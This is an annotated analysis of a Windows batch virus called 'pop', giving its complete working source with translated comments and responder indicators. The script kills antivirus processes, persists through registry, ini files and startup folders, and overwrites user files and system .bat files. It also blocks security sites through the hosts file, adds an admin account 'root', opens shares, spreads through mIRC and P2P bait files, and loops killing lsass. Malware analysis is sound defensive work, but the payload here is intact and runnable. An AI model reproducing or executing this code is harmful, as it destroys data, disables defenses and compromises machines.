::=== Annotated sample of the "pop" batch virus (original Chinese notes translated; reviewer notes added) ===
::Every "copy %0 ..." line below writes a copy of this same script to another location.
::Host artifacts a responder can check for, all taken from the lines below:
::  - %windir%\pop.bat, %windir%\<random>.bat, %windir%\ftppassword.bat, %windir%\hax0r.html
::  - Run values "pop" (HKLM and HKCU) and "html" (HKCU); RunServices value "pop" (HKLM)
::  - run=/load= lines appended to win.ini and a shell= line appended to system.ini
::  - hosts-file entries mapping security-vendor and portal domains to 127.0.0.1
::  - shares ADMIN$, C$, IPC$, c, d; local user "root" added to Administrators/Administratoren
::  - HKLM\SOFTWARE\Microsoft\Ole EnableDCOM=Y and ...\Control\Lsa restrictanonymous=0
::  - IE "Start Page" and Kazaa DownloadDir redirected; .bat files under %windir% and
::    system32, plus c:\autoexec.bat, overwritten with the script
::Annotator's note: the junk code that only served to confuse readers was removed, and the
::deliberately obfuscating environment variables (e.g. set pop=tskill) were substituted back.
copy %0 %windir%\pop.bat
::Copies itself into the Windows directory as pop.bat.
tskill norton*
tskill av*
tskill fire*
tskill anti*
tskill spy*
tskill bullguard
tskill PersFw
tskill KAV*
tskill ZONEALARM
tskill SAFEWEB
tskill OUTPOST
tskill nv*
tskill nav*
tskill F-*
tskill ESAFE
tskill cle
tskill BLACKICE
tskill def*
::Terminates common security-product processes (tskill accepts wildcard process names).
::A burst of tskill/taskkill calls against these names is itself a detectable event.
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul
echo [windows] >> %windir%\win.ini
echo run=%windir%\pop.bat >> %windir%\win.ini
echo load=%windir%\pop.bat >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe pop.bat >> %windir%\system.ini
::Switches the console code page to 1252 (Western European); the reason is not stated —
::presumably so the localized path names used below are written correctly. TODO confirm.
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\pop.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pop.bat" > nul
::Creates autostart entries in the registry Run keys, in win.ini and system.ini, and in the
::all-users Startup folders (both the English "Startup" and the "Autostart" path are tried).
net share ADMIN$
net share C$
net share IPC$
net share c=c:
net share d=d:
::Enables the system's default administrative shares and additionally shares the whole C: and D: drives.
::Overwrites every .bat/.txt/.doc/.pdf/.jpg file in the current directory with a copy of itself
::(the original contents of those files are destroyed).
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
::NOTE(review): the next line uses ">" rather than ">>", so it truncates the hosts file again;
::on an affected host only the bare-domain entries from here on are expected to be present.
echo 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
::Uses the hosts file to block common security-vendor web sites (and a few portals/search engines),
::which also prevents signature updates and downloads of removal tools from those domains.
echo MsgBox "Infected with pop", 16, "pop" > v.vbs
start v.vbs
::Pops up a dialog box announcing the infection -_- — plainly showing off.
set x=%random%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\pop.bat" /f > nul
::Copies itself into the Windows directory under a random (%random%) name and adds Run and
::RunServices startup entries, shown under the value names html and pop.
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
::Overwrites every .bat file under system32 and the Windows directory with itself.
copy %0 c:\autoexec.bat
::Overwrites c:\autoexec.bat with itself.
copy %0 %windir%\ftppassword.bat
echo [script] > irc.bat
echo n1={ if ($nick == $me) { halt } >> irc.bat
echo n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
echo n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
::Annotator: I don't understand the script code; irc.bat and ftppassword.bat seem to be generated
::to abuse an mIRC weakness.
::Reviewer note: the generated text is written over mIRC's script.ini; its n2 line is a
::"/dcc send" of ftppassword.bat (a copy of this script) to other IRC users, i.e. a spreading
::channel via mIRC. An unexpected modification of script.ini is a useful indicator here.
md %programfiles%\pop\xxx\ > nul
md %programfiles%\pop\cracks\ > nul
copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt
net share xxx&cracks=%programfiles%\pop > nul
::Creates a pile of bait-named copies under %programfiles%\pop\xxx and \cracks and shares the directory.
net user root pwd /add
net localgroup "Administratoren" root /add
net localgroup "Administrators" root /add
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
::Creates an administrator account (user "root", password "pwd"; both the German and the English
::Administrators group name are tried) and loosens network-access settings (DCOM enabled,
::RestrictAnonymous set to 0). A new local admin named "root" is a clear indicator on a host.
echo "<html>" > %windir%\hax0r.html
echo "<head>" >> %windir%\hax0r.html
echo "<title>Virus</title>" >> %windir%\hax0r.html
echo "</head>" >> %windir%\hax0r.html
echo "<body bgcolor="#000000">" >> %windir%\hax0r.html
echo "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html
echo "</body>" >> %windir%\hax0r.html
echo "</html>" >> %windir%\hax0r.html
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
::Writes a web page announcing the infection and sets it as the IE start page — showing off again -_-
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
::Drops more copies with bait names (double extensions such as .txt.bat) into P2P shared folders
::(Kazaa, Warez P2P) to trap the unwary and curious.
shutdown /r /f /t 23 /c "Infected with pop virus!!"
shutdown /s /f /t 23 /c "Infected with pop virus!!"
::A reboot and then a shutdown?! Shows off once more with a reminder that you are infected...
:bombing
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
::Presumably intended to keep the startup-folder copies from being removed during the shutdown
::countdown: an endless loop that keeps dropping random-named copies and killing explorer.exe
::and lsass.exe as harassment. (The German "Dokumente und Einstellungen" path, like
::"Administratoren" above, suggests German-localized systems were the intended targets.)
:: pop by pop
::The line above is the author's own comment, a kind of copyright notice -_-
[